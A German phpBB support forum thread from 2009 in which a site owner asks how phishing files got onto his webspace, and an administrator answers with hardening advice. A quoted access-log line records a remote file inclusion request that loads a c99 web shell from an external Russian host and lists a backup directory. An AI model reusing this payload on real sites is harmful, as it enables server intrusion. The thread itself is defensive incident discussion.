Pishing Dateien

Sicherheit den Webservers, Servers und rund um das phpBB
Gesperrt
diegoriv
User
User
Beiträge: 334
Registriert: Di 01.Feb, 2005 15:25
Wohnort: Wien
Kontaktdaten:

Pishing Dateien

Beitrag von diegoriv » Sa 18.Jul, 2009 17:23

all-inkl hat heute Pishing Dateien auf unserem Webspace gefunden.

Nun bin ich damit beschäftigt die Seite wieder herzustellen und frage mich, wie ich herausfinde, woher die kommen.

Folgenden Logfile-Auszug hat mir der Support geschickt:
- [17/Jul/2009:01:51:32 +0200] "POST /calendar.php//language/lang_english/lang_main_album.php?phpbb_root_path=http%3A%2F%2Fxakforum.altnet.ru%2Ftmp_upload%2Ffiles%2Fc99shell.txt%3F&act=ls&d=%2Fwww%2Fhtdocs%2Fv130649%2Fbackup&sort=0a HTTP/1.1" 200 7675 "http://alpinum.at/calendar.php//languag ... up&sort=0a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
Leider verstehe ich davon rein gar nichts. calendar und lang_main_album haben beispielsweise nichts miteinander zu tun.

Was kann ich also aus dem Log rausholen? Wie und Wo setze ich an?

Danke
d.
[center]***********************************************************
Alpinum.at - Forum f?r Bergfreunde
***********************************************************[/center]

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29107
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » So 19.Jul, 2009 14:20

Tjoar, in dem Log-Auszug steht diese Domain drinnen: forum.altnet.ru
Vielleicht ein Hinweis auf die Hacker, wobei das auch nur schwer zu beweisen wäre ;)

Wichtig ist aber zu erkennen, wie die eingebrochen sind.
Und zwar in die Datei lang_main_album.php!!

Dieses ist nämlich Teil eines in diesem Log-Auszug enthaltenen Links, mit dem ein Script auf deinem Webspace abgelegt wurde.

Was dagegen für zukünftige Einbrüche tun?
Alle(!!!!) Passwörter ändern und in diesem Fall folgende Änderungen an der Datei language/lang.../lang_main_album.php durchführen:

Code: Alles auswählen

#
#-----[ FIND ]-----
#
//
// Album Index
//

#
#-----[ BEFORE, ADD ]-----
#
if ( !defined('IN_PHPBB') )
{
	die("Hacking attempt");
}
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Holger
User
User
Beiträge: 2253
Registriert: Mi 17.Mär, 2004 18:09

Beitrag von Holger » So 19.Jul, 2009 18:16

Sollte man das in allen lang-Dateien machen?

diegoriv
User
User
Beiträge: 334
Registriert: Di 01.Feb, 2005 15:25
Wohnort: Wien
Kontaktdaten:

Beitrag von diegoriv » So 19.Jul, 2009 20:31

Danke oxpus für deine Analyse.
irgendwo in .ru nach einem Schuldigen zu suchen hab ich ohnehin nicht vor.

Dummerweise oder gscheiterweise startet meine lang_main_album mit

Code: Alles auswählen

if ( !defined('IN_PHPBB') )
{
   die('Hacking attempt');
   exit;
}
wie kam der Kerl trotzdem rein?
[center]***********************************************************
Alpinum.at - Forum f?r Bergfreunde
***********************************************************[/center]

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29107
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Mo 20.Jul, 2009 10:25

Er hat die Datei aufgerufen und damit ein Script "hinterrücks" mit drauf gepackt.
Je nach Absicherung des Boards und des Webservers ist er dann mehr oder weniger erfolgreich.
Ein Punkt ist eben die Prüfung der Konstante IN_PHPBB, aber bei weitem nicht alles.

Wie er es letztlich geschafft hat werde ich aus Sicherheitsgründen aber hier nicht diskutieren. Ich bitte hier um Verständnis.
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

diegoriv
User
User
Beiträge: 334
Registriert: Di 01.Feb, 2005 15:25
Wohnort: Wien
Kontaktdaten:

Beitrag von diegoriv » Mo 20.Jul, 2009 20:57

[quote="oxpus";p="88583"]Wie er es letztlich geschafft hat werde ich aus Sicherheitsgründen aber hier nicht diskutieren. Ich bitte hier um Verständnis.[/quote]

Volles Verständnis - kein Problem. Interessiert mich auch eher nur sekundär. Primär beschäftigt mich eher die Frage: Was kann ich dagegen tun?
[center]***********************************************************
Alpinum.at - Forum f?r Bergfreunde
***********************************************************[/center]

Benutzeravatar
oxpus
Administrator
Administrator
Beiträge: 29107
Registriert: Mo 27.Jan, 2003 22:13
Wohnort: Bad Wildungen
Kontaktdaten:

Beitrag von oxpus » Di 21.Jul, 2009 16:12

Was du dagegen tun kannst?
Immer alle Updates einspielen, die es zu deinen eingesetzten Scripten gibt, keine "einfachen Passwörter" verwenden, Verzeichnisschutz einrichten, wo es Sinn macht (z. B. im Admin-Ordner des Forums), etc...
Karsten Ude
-={ Das Mädchen für alles }=-
Kein Support per ICQ, Email oder PN! Unaufgeforderte Nachrichten werden ignoriert!
No support per ICQ, Email or PM. Each unasked message will be ignored!

Gesperrt